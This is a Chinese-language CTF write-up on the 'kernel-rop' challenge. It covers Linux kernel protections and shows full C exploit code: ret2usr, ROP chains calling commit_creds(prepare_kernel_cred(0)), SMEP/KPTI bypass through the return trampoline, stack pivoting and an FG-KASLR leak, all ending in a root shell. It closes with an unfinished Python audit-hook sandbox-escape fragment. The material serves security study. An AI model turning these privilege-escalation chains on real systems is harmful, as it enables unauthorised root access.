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File metadata and controls

1621 lines (1305 loc) · 52.5 KB


kernel-rop (lkmidas 版)

├── // 從 vmlinuz 取出 kernel elf 的腳本
├── initramfs.cpio.gz // Linux fs that is compressed with cpio and gzip
├── // 包含 qemu 執行的指令,以及 linux boot 的環境
└── vmlinuz // compressed Linux kernel

拿到這些檔案後,可以先用 ./ ./vmlinuz > vmlinux 將 kernel elf 取出來,並且執行 ROPgadget --binary ./vmlinux > gadgets.txt 取得 ROP gadget,因為 vmlinux kernel 比較大,因此每一次跑 ROPgadget 都要花很久的時間,因此建議先輸出到一個檔案內。而後執行 gunzip initramfs.cpio.gz && cpio -i -vd < initramfs.cpio 將壓縮後的 file system 解壓縮,而當我們取得 fs 內的檔案後,可以任意更改,並用 find . -print0 | cpio --null -ov --format=newc > initramfs.cpio 打包回去。

而在 ./rootfs/etc/init.d 底下,則會有名稱為 rcS 或是 inittab 的檔案,用於在 boot 完後執行:


/bin/busybox --install -s

stty raw -echo

chown -R 0:0 /

mkdir -p /proc && mount -t proc none /proc
mkdir -p /dev  && mount -t devtmpfs devtmpfs /dev
mkdir -p /tmp  && mount -t tmpfs tmpfs /tmp

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
chmod 400 /proc/kallsyms

insmod /hackme.ko
chmod 666 /dev/hackme

# setuidgid 0 /bin/sh

kernel pwn 的目標通常是取得 root 權限,而在 debug 時可以透過 setuidgid 0 /bin/sh 取得 root 權限的 shell,因為部分檔案會需要 root 權限才能夠讀取,如:

  • /proc/kallsyms: 列出所有 kernel symbol 所對應到的 address
  • /sys/module/core/sections/.text: 印出 kernel .text section 的 address (不過通常題目不會有 /sys pfs) (有時候會叫做

qemu-system-x86_64 \
    -m 128M \
    -cpu kvm64,+smep,+smap \
    -kernel vmlinuz \
    -initrd initramfs.cpio.gz \
    -hdb flag.txt \
    -snapshot \
    -nographic \
    -monitor /dev/null \
    -no-reboot \
    -append "console=ttyS0 kaslr kpti=1 quiet panic=1"
  • -m: memory size,有時可能是造成無法 boot 的原因
  • -cpu: 指定 CPU model,smep 與 smap 都是保護機制
  • -kernel: compressed kernel image
  • -initrd: compressed file system
  • -append: 額外的 boot option
    • -hdb: put flag.txt into /dev/sda (Use file as hard disk 0)
  • -s: qemu 會自動開啟 gdb server 在 1234 port,gdb 中可以透過 target remote 0:1234 連上
    • gdb --nx vmlinux (--nx) 可以 disable gdb script,避免出現奇怪的問題

而 kernel 也像 user program 一樣,有一些自己的保護機制:

  • Kernel stack cookies (or canaries): 就是 canary,而在 kernel compile 時就已經加上,因此不能 disable
  • KASLR (kernel address space layout randomization): kernel 版的 ASLR
    • -append "kaslr"
    • -append "nokaslr"
  • Supervisor mode execution protection (SMEP): 用 CR4 的 20th bit 來控制是否開啟,會 mark 所有的 user mode page 為 non-executable
    • -cpu +smep
    • -append "nosmep"
  • Supervisor Mode Access Prevention (SMAP): 用於補充 SMEP,CR4 的 21th bit 來控制,代表不能存取 (read/write) userland page
    • -cpu +smap
    • -append "nosmap"
  • Kernel page-table isolation (KPTI): kernel 會把 user-page 以及 kernel-page 分離,分離的方式為將 page 分成兩個集合:
    • 包含所有 kernel + user 的 page table set,不過 kernel mode 時才會使用
    • 包含最小集合的 kernel-space address + 複製的 user-space
    • -append "kpti=1"
    • -append "nopti"

kernel module hackme.ko 內先使用 misc_register() 註冊 hackme miscdevice,miscdevice 的 struct 如下:

struct miscdevice  {
 int minor;
 const char *name;
 const struct file_operations *fops; // fops 為 file operation,定義使用 fcntl() 或是 orw 等等對這個 device 做 operation 時,module 會有怎樣的行為
 struct list_head list;
 struct device *parent;
 struct device *this_device;
 const char *devnode;

一共有四個 operation: hackme_read, hackme_write, hackme_open and hackme_release

ssize_t __fastcall hackme_read(file *f, char *data, size_t size, loff_t *off)
  _memcpy(hackme_buf, tmp, size);
  if ( size > 0x1000 )
    _warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL);
  v6 = copy_to_user(data, hackme_buf, v5) == 0;

ssize_t __fastcall hackme_write(file *f, const char *data, size_t size, loff_t *off)
  if ( size > 0x1000 )
    _warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL);
  copy_from_user(hackme_buf, data, v5);
  _memcpy(tmp, hackme_buf, v5);

read() 會先從 tmp copy size (<= 0x1000) 大小的資料到 hackme_buf,再透過 copy_to_user() 回傳 userland;write() 會先從 hackme_buf copy size (<= 0x1000) 大小的資料到 tmp,再透過 copy_from_user() 讀 userland 的資料;而 BUG()ud2 undefined instruction,能夠 raise invalid opcode exception。


qemu configuration (也可以想成是題目的限制):

  • remove: smepsmapkpti=1kslr
  • add: noptinokaslr

第一次在打 Pwn 時,通常會接觸到 NX 沒開 + stack overflow,可以直接執行 shellcode 的攻擊方法,而 ret2usr 也是類似的概念,透過控制 return address (bof),跳到 userland 定義的 function 直接執行。

當可以控制 control flow 時,需要在 kernel mode 執行 commit_creds(prepare_kernel_cred(0)) 來做 privilege escalation

  • prepare_kernel_cred() 建立一個新的 credential (cred),0 代表 cred 中的 uid, gid 設為0 (root)
  • commit_creds() 將 cred 應用在現在的 process,因此 process 的權限即為 root

而 kernel mode 要回 usermode 時,必須要 iretq (interrupt return),x86 instruction 有列出 iretq 在不同指令集的模式下有不同的 operation,而 amd64 屬於 IA-32e-MODE:

    IF NT = 1
        THEN #GP(0);
    ELSE IF OperandSize = 32
                EIP ← Pop();
                CS ← Pop();
                tempEFLAGS ← Pop();
        ELSE IF OperandSize = 16
                        EIP ← Pop(); (* 16-bit pop; clear upper bits *)
                        CS ← Pop(); (* 16-bit pop *)
                        tempEFLAGS ← Pop(); (* 16-bit pop; clear upper bits *)
        ELSE (* OperandSize = 64 *)
                            RIP ← Pop();
                            CS ← Pop(); (* 64-bit pop, high-order 48 bits discarded *)
                            tempRFLAGS ← Pop();
                IF instruction began in 64-Bit Mode
                            IF OperandSize = 32
                                    ESP ← Pop();
                                    SS ← Pop(); (* 32-bit pop, high-order 16 bits discarded *)
                            ELSE IF OperandSize = 16
                                    ESP ← Pop(); (* 16-bit pop; clear upper bits *)
                                    SS ← Pop(); (* 16-bit pop *)
                                ELSE (* OperandSize = 64 *)
                                    RSP ← Pop();
                                    SS ← Pop(); (* 64-bit pop, high-order 48 bits discarded *)

stack 由上到下必須放置 RIP | CS | tempRFLAGS | RSP | SS,所以在進入 kernel mode 前,就可以先把這些 register 的值儲存起來,而在 return 回 shellcode 前重新 push 到 stack 當中 (kernel 不會動到 user_<reg>),並且在 push 回去前,必須執行 swapgs:

  • swap the GS register between kernel-mode and user-mode
  • exchanges the CPL 0 data pointer from the IA32_KERNEL_GS_BASE MSR with the GS base register
IF CS.L ≠ 1 (* Not in 64-Bit Mode *)
        #UD; FI;
IF CPL ≠ 0
    THEN #GP(0); FI;
tmp ← GS.base;

這邊用一個一個 push 回去的方法,而也可以用 swapgs_restore_regs_and_return_to_usermode


#define _GNU_SOURCE
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>

int devfd;
unsigned long user_cs, user_ss, user_rflags, user_sp;
unsigned long canary;
unsigned long prepare_kernel_cred = 0xffffffff814c67f0;
unsigned long commit_creds = 0xffffffff814c6410;

void open_dev()
    if ((devfd = open("/dev/hackme", O_RDWR)) < 0)
        perror("[-] open dev failed");
    puts("[+] open dev success");

void leak()
    char data[0x100];
    if (read(devfd, data, sizeof(data)) < 0)
        perror("[-] read dev failed");
    canary = *(unsigned long *) (data + (0xa0-0x20));
    puts("[+] leak canary success");
    printf("[*] canary: 0x%08lx\n", canary);

void get_shell()

unsigned long user_rip = (unsigned long) get_shell;
void esc_priv()
    __asm__ volatile(
        ".intel_syntax noprefix \n"
        "mov rax, prepare_kernel_cred \n"
        "xor rdi, rdi \n"
        "call rax \n"
        "mov rdi, rax \n"
        "mov rax, commit_creds \n"
        "call rax \n"
        "swapgs \n"
        "mov r15, user_ss \n"
        "push r15 \n"
        "mov r15, user_sp \n"
        "push r15 \n"
        "mov r15, user_rflags \n"
        "push r15 \n"
        "mov r15, user_cs \n"
        "push r15 \n"
        "mov r15, user_rip \n"
        "push r15 \n"
        "iretq \n"
        ".att_syntax \n"

void save_status()
    __asm__ volatile(
        ".intel_syntax noprefix \n"
        "mov user_cs, cs \n"
        "mov user_ss, ss \n"
        "mov user_sp, rsp \n"
        "pushf \n"
        "pop user_rflags \n"
        ".att_syntax \n"
    puts("[*] save status");

void overflow()
    unsigned long rop[0x20];
    int off = (0xa0 - 0x20) / sizeof(unsigned long);
    rop[off++] = canary; // 0x20
    rop[off++] = 0; // 0x18
    rop[off++] = 0; // 0x10
    rop[off++] = 0; // 0x08
    rop[off++] = (unsigned long) esc_priv;

    if (write(devfd, rop, sizeof(rop)) < 0)
        perror("[-] write dev failed");
    puts("[+] write dev success");


int main()
    return 0;

assembly code:

  • .intel_syntax noprefix 能讓 gcc 編譯 intel 語法的 inline assembly,而 noprefix 是用來 disable register 的 % 前綴,在 __asm__() 的最後須要將 syntax recover 回 att_syntax,確保後續的 assemble 不會壞掉 (default 是用 AT&T),範例如下:

    ".intel_syntax noprefix \n"
    "mov rdi \n"
    "mov rsi \n"
    ".att_syntax \n"
    : input operand : output operand : clobber list
  • asm inline

  • asm inline example


現在讓執行環境多了 SMEP 的限制,對比一開始學時 Pwn 的時候,可以想像成是 stack 加了 NX,而 NX 的限制會使用 ROP 來繞過,因此有了 SMEP 的環境也可以使用 kernel ROP 來做 exploit,以下兩種情境的 exploit 方式不一樣:

  • 可以任意控制 kernel stack
  • 只能 overwrite return address

CR4 的第 20 bit (0x100000) 是用來控制 SMEP,如果有 gadget 如 mov cr4, rdi 可以使用,或者是原生的 kernel function native_write_cr4(val),就能改寫掉 cr4 的內容。

如果要查看 cr4 的值的話,可以直接執行原本的 exploit,並在 crash 時印出的 debug information 找到 (00000000001006f0),也可以透過 gdb 來看。exploit 只需改變 overflow() function 為:

void overflow()
    unsigned long rop[0x20];
    int off = (0xa0 - 0x20) / sizeof(unsigned long);
    rop[off++] = canary; // 0x20
    rop[off++] = 0; // 0x18
    rop[off++] = 0; // 0x10
    rop[off++] = 0; // 0x08
    rop[off++] = pop_rdi_ret; //      <-- add
    rop[off++] = 0x6f0; //            <-- add
    rop[off++] = native_write_cr4; // <-- add
    rop[off++] = (unsigned long) esc_priv;

    if (write(devfd, rop, sizeof(rop)) < 0)
        perror("[-] write dev failed");
    puts("[+] write dev success");

ROPgadget 在找 gadget 時並不會判斷說哪個地方是 .text,哪個地方是 .data,因此可能會遇到 gadget 無法執行的情況。

而在修改 20 bit of cr4 時,出現了 error msg pinned CR4 bits changed參考這篇文章所說,在比較新的 kernel 中,cr4 中有些 bit 在 boot 時就已經 pinned,也就是不會在 runtime 被 common function 如 native_write_cr4() 所更改,被 pin 的 bit 有 SMEP, SMAP, and UMIP,以下為 native_write_cr4() 的 source code:

static const unsigned long cr4_pinned_mask =
void native_write_cr4(unsigned long val)
	unsigned long bits_changed = 0;

	asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

	if (static_branch_likely(&cr_pinning)) {
		if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
			bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
			val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
			goto set_register;
		/* Warn after we've corrected the changed bits. */
		WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",

沒辦法 return 回 user code,就只能在 kernel 做 ROP,不過還是需要執行到一些必要的 function:

  • prepare_kernel_cred(0)
  • commit_creds()
  • swapgs ; ret
  • iret + RIP | CS | RFLAGS | SP | SS
unsigned long prepare_kernel_cred = 0xffffffff814c67f0;
unsigned long commit_creds = 0xffffffff814c6410;
unsigned long pop_rdi_ret = 0xffffffff81006370;

unsigned long pop_rdx_ret = 0xffffffff81007616;
unsigned long cmp_rdx_8_jne_pop_rbx_pop_rbp_ret = 0xffffffff81964cc4;
unsigned long mov_rdi_rax_jne_pop_rbx_pop_rbp_ret = 0xffffffff8166fea3;
unsigned long swapgs_pop_rbp_ret = 0xffffffff8100a55f;
unsigned long iretq = 0xffffffff8100c0d9;

unsigned long user_rip = (unsigned long) get_shell;
void overflow()
    unsigned long rop[50];
    int off = (0xa0 - 0x20) / sizeof(unsigned long);
    rop[off++] = canary; // 0x20
    rop[off++] = 0; // 0x18
    rop[off++] = 0; // 0x10
    rop[off++] = 0; // 0x08
    rop[off++] = pop_rdi_ret;
    rop[off++] = 0;
    rop[off++] = prepare_kernel_cred;
    rop[off++] = pop_rdx_ret;
    rop[off++] = 8;
    rop[off++] = cmp_rdx_8_jne_pop_rbx_pop_rbp_ret;
    rop[off++] = 0;
    rop[off++] = 0;
    rop[off++] = mov_rdi_rax_jne_pop_rbx_pop_rbp_ret;
    rop[off++] = 0;
    rop[off++] = 0;
    rop[off++] = commit_creds;
    rop[off++] = swapgs_pop_rbp_ret;
    rop[off++] = 0;
    rop[off++] = iretq;
    rop[off++] = user_rip;
    rop[off++] = user_cs;
    rop[off++] = user_rflags;
    rop[off++] = user_sp;
    rop[off++] = user_ss;

    if (write(devfd, rop, sizeof(rop)) < 0)
        perror("[-] write dev failed");
    puts("[+] write dev success");

當 overflow 的空間不夠時,必須想辦法把 rsp 改到自己可以控制的地方 (stack pivoting),如果有 mov esp, <const> 這種 gadget,就能透過 mmap 建造一個 memory region 來寫 ROP,並 overwrite return address 成那個 gadget,這樣就可以成功 stack pivoting。

int stack_off = 0x1000 / 8;
unsigned long *stack = mmap(0x5b000000-0x2000, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
stack[0] = 0xdeadbeef;
stack[stack_off++] = 0x0;
stack[stack_off++] = 0x0;
stack[stack_off++] = pop_rdi_ret;
stack[stack_off++] = 0;
stack[stack_off++] = prepare_kernel_cred;
stack[stack_off++] = pop_rdx_ret;
stack[stack_off++] = 8;
stack[stack_off++] = cmp_rdx_8_jne_pop_rbx_pop_rbp_ret;
stack[stack_off++] = 0;
stack[stack_off++] = 0;
stack[stack_off++] = mov_rdi_rax_jne_pop_rbx_pop_rbp_ret;
stack[stack_off++] = 0;
stack[stack_off++] = 0;
stack[stack_off++] = commit_creds;
stack[stack_off++] = swapgs_pop_rbp_ret;
stack[stack_off++] = 0;
stack[stack_off++] = iretq;
stack[stack_off++] = user_rip;
stack[stack_off++] = user_cs;
stack[stack_off++] = user_rflags;
stack[stack_off++] = user_sp;
stack[stack_off++] = user_ss;

stack[0] = 0xdeadbeef 的目的是避免觸發 Double Fault PANIC: double fault,因為 mmap 後 page 並不會被載入,直到被存取才會觸發 page fault,但是因為要修改的地方在第二個 page,所以應該要先存取第一個 page 讓 page 被載入才行。

  • Double fault: occurs if the processor encounters a problem while trying to service a pending interrupt or exception. An example situation when a double fault would occur is when an interrupt is triggered but the segment in which the interrupt handler resides is invalid. If the processor encounters a problem when calling the double fault handler, a triple fault is generated and the processor shuts down
  • Page fault in Interrupt context
  • 以這個例子來說,如果第一個 page 沒有被存取到,則在 kernel mode 存取時會觸發 page fault,而造成 interrup + page fault 同時發生,這樣就會有 Double fault 的情況,而 kernel 沒辦法 kill interrup handler,因此只能 reboot

KPTI (Kernel page-table isolation) 可以分隔 user-space and kernel-space page tables:

  • One set of page tables includes both kernel-space and user-space addresses same as before, but it is only used when the system is running in kernel mode

  • The second set of page tables for use in user mode contains a copy of user-space and a minimal set of kernel-space addresses

  • process 自己的 page table 由 CR3 register 所指著。而在沒有 KPTI 時,kernel-space 以及 user space 共用同個 PGD,避免在切換時要 TLB flush、swap table 等等需要很大開銷的操作

  • 每個 process 有兩個 page table,kernel page table 以及 user page table,kernel page table 只能在 kernel-mode 存取,內容包含 kernel / user space mapping;user page table 只有 user space,不過因為 context switch,因此 user page table 仍需要少量的 kernel space,用來建立 interrupt entry 以及 exit

  • 當 interrupt 發生時會切換 cr3,而 cr3 + 0x1000 指向 PGD user、cr3 指向 PGD kernel

  • 不過 kernel mode 似乎也可以存取 PGD user (在沒有 iretq 前)

  • 因此當提權後透過 iretq 回去 user space 時,如果 cr3 仍為 kernel page,就會 trigger segmentation fault,而在 kernel 中仍有辦法繞過:

    mov     rdi, cr3
    or      rdi, 1000h
    mov     cr3, rdi

Bypass KPTI 有兩種方式:

  • Signal handler: 當因為 KPTI 而觸發 SIGSEGV 時,如果已經將 get_shell() define 成 SIGSEGV signal handler,則可以直接取得 shell。此方法只需要加上:

    #include <signal.h>
    signal(SIGSEGV, get_shell);
  • KPTI trampoline: if a syscall returns normally, there must be a piece of code in the kernel that will swap the page tables back to the userland ones, so we will try to reuse that code to our purpose

    • swapgs_restore_regs_and_return_to_usermode()

調整一下 ROP,改換做使用 swapgs_restore_regs_and_return_to_usermode(),不過此 function 前面在做一些沒必要的 pop,因此可以直接從 swapgs_restore_regs_and_return_to_usermode+22 開始執行,整個 trampoline 如下:

<_stext+2101030>    mov    rdi, rsp
<_stext+2101033>    mov    rsp, qword ptr gs:[0x6004]
<_stext+2101042>    push   qword ptr [rdi + 0x30]
<_stext+2101045>    push   qword ptr [rdi + 0x28]
<_stext+2101048>    push   qword ptr [rdi + 0x20]
<_stext+2101051>    push   qword ptr [rdi + 0x18]
<_stext+2101054>    push   qword ptr [rdi + 0x10]
<_stext+2101057>    push   qword ptr [rdi]
<_stext+2101059>    push   rax
<_stext+2101060>    nop    
<_stext+2101062>    mov    rdi, cr3
<_stext+2101065>    jmp    _stext+2101119 <_stext+2101119>

<_stext+2101119>    or     rdi, 0x1000
<_stext+2101126>    mov    cr3, rdi
<_stext+2101129>    pop    rax
<_stext+2101130>    pop    rdi
<_stext+2101131>    swapgs
<_stext+2101134>    nop    dword ptr [rax]
<_stext+2101137>    jmp    _stext+2101184 <_stext+2101184>
<_stext+2101184>    test   byte ptr [rsp + 0x20], 4
<_stext+2101189>    jne    _stext+2101193 <_stext+2101193>
<_stext+2101191>    iretq

短短的幾個 instruction,popswapgsiretq、recover cr3 什麼都有了,exploit 只需要改變 ROP 的 gadget 即可:

    stack[stack_off++] = mov_rdi_rax_jne_pop_rbx_pop_rbp_ret;
    stack[stack_off++] = 0;
    stack[stack_off++] = 0;
    stack[stack_off++] = commit_creds;
    stack[stack_off++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
    stack[stack_off++] = 0;
    stack[stack_off++] = 0;
    stack[stack_off++] = user_rip;
    stack[stack_off++] = user_cs;
    stack[stack_off++] = user_rflags;
    stack[stack_off++] = user_sp;
    stack[stack_off++] = user_ss;
  • 原生 gdb 中 list map
    • maintenance info sections
    • info proc mappings

SMAP 為第 21 bit of CR4,連 user space address 都不能夠存取了,不過既然有 copy_from_user(),一定會需要 touch user space address,所以一定有 gadget 可以使用。

  • 原本第一種情況的 exploit 仍然可以使用 (signal),因為沒有存取到 userland 的資料
  • 第二種使用 stack pivoting 到 userland,所以不能使用,而在 SMAP、SMEP、KPTI 的情況下,只能蓋一個 return address 似乎沒辦法做到什麼事情,仍需要其他的 primitive (先決條件) 才能 exploit
    • 所以如果有辦法在程式中找到漏洞,能夠控制不只一個 return address 的空間,以及有 gadget 可以把 stack 遷至那,應該就可以堆 ROP & exploit 了
  • 查看 arch/x86/libc/copy_user_64.S 可以看到 instruction stac 以及 clac 用來 allow / disallow SMAP
    • stac (Set AC Flag)
    • clac (Clear AC Flag)
    • 不確定可不可行 (fault in user-space)

有了 KASLR,就需要 leak kernel stack 內的 address,並且減掉 offset 得到 kernel base,之後加上各個 gadget 的 offset 就能 exploit 了,不過這題用的是 FG KASLR:

  • FG (Function Granular) KASLR
    • symbols get randomized on their own, so there addresses are not a constant offset from the kernel .text base like what we used to deal with
    • but there are certain regions in the kernel that never get randomized
  • commit log

所以重點是要找出哪些 gadget 是不被影響的,以及找出得到那些 randomized function offset 的方法:

  • Functions from _text base to __x86_retpoline_r15, which is _text+0x400dc6 are unaffected
  • swapgs_restore_regs_and_return_to_usermode() is unaffected
  • kernel symbol table ksymtab, starts at _text+0xf85198 is unaffected

ksymtab 存 kernel symbol,而 kernel symbol 的 struct 為:

struct kernel_symbol {
	int value_offset;
	int name_offset;
	int namespace_offset;

kernel_symbol.value_offset 是指與 entry 相對的 offset,並非 _text

可以從 /proc/moduleskernel_symbol entry:

/ # cat /proc/modules 
hackme 20480 0 - Live 0xffffffffc0338000 (O)
/ # cat /proc/kallsyms | grep ksymtab_commit_creds
ffffffff9dd87d90 r __ksymtab_commit_creds
/ # cat /proc/kallsyms | grep ksymtab_prepare_kernel_cred
ffffffff9dd8d4fc r __ksymtab_prepare_kernel_cred
/ # cat /proc/kallsyms | grep _text | head -n 1
ffffffff9ce00000 T _text

並且從 leak 的 stack 當中,找到每次 offset 都是固定的 address,這個部分比較簡單,只要看 leak 出來的 address 就知道末 12 bits 差很多,而不受影響的 (KASLR) 則是 12 bits 固定。注意:

  • 8 個 f 0xffffffff00000000 是 text or stack,可以看裡面存的是 code 還是 data 判斷
  • 4 個 f 0xffff000000000000 是 heap



import sys

if len(sys.argv) <= 1:

with open(sys.argv[1], 'r') as f:
    datas ='\n')

base = int(datas[-1], 16)
datas = datas[:-1]

out = ""
for data in datas:
    k, v = data.split(": ")
    out += f"{k}: {hex(int(v, 16) - base)}\n"

open(f"{sys.argv[1]}.out", "w").write(out)

檔案格式如下,最下面為 _text address:

[*] 0: 0xffffffff9a9ac560
[*] 8: 0x00000015
[*] 496: 0x00403180
[*] 504: 0x00000000

之後用 vimdiff <(cat A.out) <(cat B.out) 查看是否有相同的地方,最後得到結果 [*] 304: 0xa157 在兩個檔案中是相同的,求得 kernel base。

之後就找可以使用的 gadget,以及 /proc/kallsyms__ksymtab 開頭的 symbol 如 __ksymtab_commit_creds__ksymtab_prepare_kernel_cred,之後找有用 + 不會受影響的 gadget (不知道怎麼找):

0x4d11; // pop rax ; ret
0x015a80; // mov eax, dword ptr [rax] ; pop rbp ; ret

0x200f10; // swapgs_restore_regs_and_return_to_usermode
0xf85198; // ksymtab
0xf87d90; // __ksymtab_commit_creds
0xf8d4fc; // __ksymtab_prepare_kernel_cred

文章作者發現在 __x86_retpoline_r15 之前的都不會受到 FGKASLR 的影響,不過找不到 source code arch/x86/boot/compressed/fgkaslr.c,實在不知道怎麼發現的。

由於 ROP 的大小有限,因此分成個步驟來執行:

  • leak commit_creds
  • leak prepare_kernel_cred
  • call prepare_kernel_cred()
  • call commit_creds()
    • get_shell()
#define _GNU_SOURCE
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <signal.h>

int devfd;
unsigned long user_cs, user_ss, user_rflags, user_sp;
unsigned long canary;
unsigned long base;
unsigned long pop_rax_ret;
unsigned long pop_rdi_ret;
unsigned long read_rax_pop_rbp_ret;
unsigned long __ksymtab_commit_creds;
unsigned long __ksymtab_prepare_kernel_cred;
unsigned long swapgs_restore_regs_and_return_to_usermode;
unsigned long commit_creds, prepare_kernel_cred, cred;
unsigned long tmp;

void leak_commit_creds();
void leak_prepare_kernel_cred();
void call_prepare_kernel_cred();
void call_commit_creds();
void get_shell();

void open_dev()
    if ((devfd = open("/dev/hackme", O_RDWR)) < 0)
        perror("[-] open dev failed");
    puts("[+] open dev success");

void leak_base()
    char data[0x140];
    if (read(devfd, data, sizeof(data)) < 0)
        perror("[-] read dev failed");
    canary = *(unsigned long *) (data + (0xa0-0x20));
    base = *(unsigned long *) (data + 304) - 0xa157;
    printf("[*] canary: 0x%08lx\n", canary);
    printf("[*] leak base: 0x%08lx\n", base);
    /* gadget */
    pop_rax_ret = base + 0x4d11;
    pop_rdi_ret = base + 0x6370;
    read_rax_pop_rbp_ret = base + 0x15a80;
    __ksymtab_commit_creds = base + 0xf87d90;
    __ksymtab_prepare_kernel_cred = base + 0xf8d4fc;
    swapgs_restore_regs_and_return_to_usermode = base + 0x200f10;
    printf("[*] pop_rax_ret: 0x%08lx\n", pop_rax_ret);
    printf("[*] pop_rdi_ret: 0x%08lx\n", pop_rdi_ret);
    printf("[*] read_rax_pop_rbp_ret: 0x%08lx\n", read_rax_pop_rbp_ret);
    printf("[*] __ksymtab_commit_creds: 0x%08lx\n", __ksymtab_commit_creds);
    printf("[*] __ksymtab_prepare_kernel_cred: 0x%08lx\n", __ksymtab_prepare_kernel_cred);
    printf("[*] swapgs_restore_regs_and_return_to_usermode: 0x%08lx\n", swapgs_restore_regs_and_return_to_usermode);
    puts("wait for attach...");

void get_shell()

void save_status()
    __asm__ volatile(
        ".intel_syntax noprefix \n"
        "mov user_cs, cs \n"
        "mov user_ss, ss \n"
        "mov user_sp, rsp \n"
        "pushf \n"
        "pop user_rflags \n"
        ".att_syntax \n"
    puts("[*] save status");

void leak_commit_creds()
    unsigned long user_rip = (unsigned long) leak_prepare_kernel_cred;
    /* rop */
    unsigned long rop[50];
    int off = (0xa0 - 0x20) / sizeof(unsigned long);
    rop[off++] = canary; // 0x20
    rop[off++] = 0; // 0x18
    rop[off++] = 0; // 0x10
    rop[off++] = 0; // 0x08
    rop[off++] = pop_rax_ret;
    rop[off++] = __ksymtab_commit_creds;
    rop[off++] = read_rax_pop_rbp_ret;
    rop[off++] = 0;
    rop[off++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
    rop[off++] = 0;
    rop[off++] = 0;
    rop[off++] = user_rip;
    rop[off++] = user_cs;
    rop[off++] = user_rflags;
    rop[off++] = user_sp;
    rop[off++] = user_ss;

    if (write(devfd, rop, sizeof(rop)) < 0)
        perror("[-] write dev failed");
    puts("[+] leak commit_creds");

void leak_prepare_kernel_cred()
    __asm__ volatile(
        ".intel_syntax noprefix \n"
        "mov tmp, rax \n"
        ".att_syntax \n"
    commit_creds = (int) tmp + __ksymtab_commit_creds;

    unsigned long user_rip = (unsigned long) call_prepare_kernel_cred;
    /* rop */
    unsigned long rop[50];
    int off = (0xa0 - 0x20) / sizeof(unsigned long);
    rop[off++] = canary; // 0x20
    rop[off++] = 0; // 0x18
    rop[off++] = 0; // 0x10
    rop[off++] = 0; // 0x08
    rop[off++] = pop_rax_ret;
    rop[off++] = __ksymtab_prepare_kernel_cred;
    rop[off++] = read_rax_pop_rbp_ret;
    rop[off++] = 0;
    rop[off++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
    rop[off++] = 0;
    rop[off++] = 0;
    rop[off++] = user_rip;
    rop[off++] = user_cs;
    rop[off++] = user_rflags;
    rop[off++] = user_sp;
    rop[off++] = user_ss;

    if (write(devfd, rop, sizeof(rop)) < 0)
        perror("[-] write dev failed");
    puts("[+] leak prepare_kernel_cred");

void call_prepare_kernel_cred()
    __asm__ volatile(
        ".intel_syntax noprefix \n"
        "mov tmp, rax \n"
        ".att_syntax \n"
    prepare_kernel_cred = (int) tmp + __ksymtab_prepare_kernel_cred;

    unsigned long user_rip = (unsigned long) call_commit_creds;
    /* rop */
    unsigned long rop[50];
    int off = (0xa0 - 0x20) / sizeof(unsigned long);
    rop[off++] = canary; // 0x20
    rop[off++] = 0; // 0x18
    rop[off++] = 0; // 0x10
    rop[off++] = 0; // 0x08
    rop[off++] = pop_rdi_ret;
    rop[off++] = 0;
    rop[off++] = prepare_kernel_cred;
    rop[off++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
    rop[off++] = 0;
    rop[off++] = 0;
    rop[off++] = user_rip;
    rop[off++] = user_cs;
    rop[off++] = user_rflags;
    rop[off++] = user_sp;
    rop[off++] = user_ss;

    if (write(devfd, rop, sizeof(rop)) < 0)
        perror("[-] write dev failed");
    puts("[+] leak prepare_kernel_cred");

void call_commit_creds()
    __asm__ volatile(
        ".intel_syntax noprefix \n"
        "mov tmp, rax \n"
        ".att_syntax \n"
    cred = tmp;
    unsigned long user_rip = (unsigned long) get_shell;
    /* rop */
    unsigned long rop[50];
    int off = (0xa0 - 0x20) / sizeof(unsigned long);
    rop[off++] = canary; // 0x20
    rop[off++] = 0; // 0x18
    rop[off++] = 0; // 0x10
    rop[off++] = 0; // 0x08
    rop[off++] = pop_rdi_ret;
    rop[off++] = cred;
    rop[off++] = commit_creds;
    rop[off++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
    rop[off++] = 0;
    rop[off++] = 0;
    rop[off++] = user_rip;
    rop[off++] = user_cs;
    rop[off++] = user_rflags;
    rop[off++] = user_sp;
    rop[off++] = user_ss;

    if (write(devfd, rop, sizeof(rop)) < 0)
        perror("[-] write dev failed");
    puts("[+] leak prepare_kernel_cred");

void exploit()

int main()
    return 0;

編譯: gcc -static -fno-stack-protector -o exp exp.c


#!/usr/bin/python3 -u

import sys
from os import _exit as __exit

# 可以由 name 來判斷當前 audit event
def audit(name, args):
    # name == exec
    # args == code object
    if not audit.did_exec and name == 'exec':
        audit.did_exec = True
audit.did_exec = False

sys.stdout.write('> ')
    # compile(source, fn, 'exec')
    # source 像是 "for i in range(0,10): print(i)"
    # 也能用 for {} 或是 x = 1 ; y = 2 等等平常 python 不能用的 symbol
    code = compile(, '<user input>', 'exec')
sys.stdin.close() # 關閉輸入

for module in set(sys.modules.keys()):
    if module in sys.modules:
        del sys.modules[module]


namespace = {}
    # exec(object[, globals[, locals]])
    exec(code, namespace, namespace)

由於 audit.did_exec == True 的限制,在第二次發生 audit event 時,會直接執行 _exit(1),因此必須要在不 trigger audit event 的情況下 import module。

exec 再傳入沒有 builtins key 的 global namespace 時,會把 builtins 自己加進去,程式可以透過 __builtins__ 來取得。

  • ipy 使用 __builtins__ 時是當作 module (__builtins__.__loader__),而 exec 內部是當作 dict (__builtins__['__loader__'])


  1. bypass audithook 只能執行一次的限制
  2. bypass modules 被刪除的限制

